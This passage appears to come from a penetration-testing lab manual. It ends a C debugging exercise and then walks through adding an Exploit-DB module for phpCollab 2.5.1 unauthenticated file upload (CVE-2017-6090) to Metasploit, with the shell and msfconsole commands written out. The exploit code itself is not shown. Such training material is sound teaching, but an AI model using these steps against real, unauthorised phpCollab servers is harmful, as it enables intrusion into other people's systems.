We find that temp is a char* which has been assigned a string literal, and so we cannot modify the contents of the literal as on line 8. This is what is causing a core dump. The process we have followed here is the basics and beginnings of debugging, and you are encouraged to explore it more if you want to write your own exploits. - We have accomplished what we wanted to in this exercise, close all programs and clean up from the exercise.
- Create a small program and work through the basic debugging process
Exercise 10: Adding an Exploit to MetasploitScenarioIn this lab you will
- Take an exploit from the exploit database and add it to Metasploit
- Click Kali 2018.2, and type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- There are times when a new exploit will be added to the exploit database or you might even want to build and customize one on your own, we will work through the process of doing that in this lab.
We have two ruby exploits that have been downloaded in the Downloads folder in Kali, we will work with the 43519 script file, and this is the phpCollab 2.5.1 - Unauthenticated File Upload exploit that has a CVE number of CVE-2017-6090 and it was published 1-11-2018. - Open a terminal window, and type gedit /root/Downloads/43519.rb and press Enter. This command will open the file in the gedit text editor window.
- 43519.rb file opens up in text editor window as shown in the screenshot. As you see here, this is the structure of Metasploit module and contains the information that we can view with the info command in the modules. Take a few minutes and review the code within the module. As a reminder, we need to vet all scripts before we ever use them in our testing and that is why we are covering this here. If you are new to Ruby then you need to research it and understand what you are running when you run these modules against clients who are contracting you as a professional penetration tester.
Close the text editor window after review. - We need to copy the module, the easiest way, is to enter the Metasploit directory, and then copy the code into it, type cd /usr/share/metasploit-framework/modules/exploits/multi/http and press Enter.
This will place you in the directory that contains the http exploit modules, since we are working with PHP this seems like a good place to put it. - Copy the code with the following command: type cp /root/Downloads/43519.rb phpcollab.rb and press Enter. This will copy the exploit to the directory and rename it.
- Type service postgresql start and press Enter.
- Type msfconsole and press Enter to start Metasploit console and then reload the exploits.
- msfconsole appears, type reload_all and press Enter.
- Now, it is time to see if we can find our added exploit, and the best way to do that is to search for it, type search phpcollab and press Enter.
- You should see your exploit! Congratulations! You have just updated exploits in Metasploit, type use exploit/multi/http/phpcollab and press Enter.
- Once you are in the exploit, type info and press Enter to read about the exploit, and then once you have finished reading, then type show options and press Enter. Review the options that are available.
- To view the Targets type show targets and press Enter. In this case we only have one target.
- Here is information about this application. phpCollab is an open-source internet-enabled collaboration workspace for project teams. Modeled on Macromedia Sitespring, phpCollab's architecture allows for the consulting team to share information with each other in one space and publish that information, when desired, to another space for the client. phpCollab encompasses the most important aspects of project management, such as task planning and document sharing, and hooks into other open source applications, such as Mantis for bug tracking, and PhPNuke (using phpCollabPublisher) for content management, for ongoing project support. phpCollab's community, part of the larger sourceforge open source software community, is highly active and the dedicated volunteer team of developers, testers, and documenters is constantly enhancing the application to meet user needs.*
You could setup a lab and then test your exploit as well. - We have accomplished what we wanted to in this lab, so we can clean up from the exercise and close all programs.
- Take an exploit from the exploit database and add it to Metasploit